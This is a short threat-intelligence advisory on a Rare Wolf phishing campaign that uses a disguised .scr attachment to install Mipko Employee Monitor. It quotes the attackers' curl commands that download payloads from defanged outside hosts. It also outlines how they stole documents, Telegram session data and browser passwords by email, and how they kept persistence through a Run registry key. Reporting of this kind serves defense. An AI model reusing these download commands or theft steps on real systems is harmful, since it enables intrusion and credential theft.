Rare Wolf uses legitimate software and disguises in the form of documents with tactical and technical requirements to attack Russian organizations
At the beginning of June , BI.ZONE Threat Intelligence experts recorded a new campaign by the Rare Wolf group related to the distribution of Mipko Employee Monitor, software for remote monitoring of employee activities in the workplace.
Presumably, the victim received a phishing email with an attachment containing the executable file Проект ТТТ 26.2024.scr . When launched by the user, the target machine was compromised.
In this case, the following actions were implemented:
1. The user saw the “expected” distracting document.
2. Archives with additional tools were downloaded from the remote server:
C:\Intel\curl.exe -o C:\Intel\keys.rar hxxp://hostingforme[.]nl/down/keys.rar
C:\Intel\curl.exe -o C:\Intel\MPK.rar hxxp://hostingforme[.]nl/down/MPK.rar
C:\Intel\curl.exe -o C:\Intel\pas.rar hxxp://hostingforme[.]nl/down/pas.rar
3. An executable file was downloaded that decrypted the received archives:
C:\Intel\curl.exe -o C:\Intel\driver.exe hxxp://supersuit[.]site/down/driver.exe
4. Files whose names matched the masks *.doc*, *.pdf*, and all files from AppData\Roaming\Telegram Desktop\tdata folder were sent to the attacker’s email using the Blat program.
5. Passwords were collected from browsers into a text file password.txt , then it was also sent to the attacker’s email.
6. Mipko Employee Monitor software was then installed, allowing the attacker to interact with the compromised system. Including being attached to it through the Software\Microsoft\Windows\CurrentVersion\Run registry branch.
Read more about the Rare Wolf group in our research .
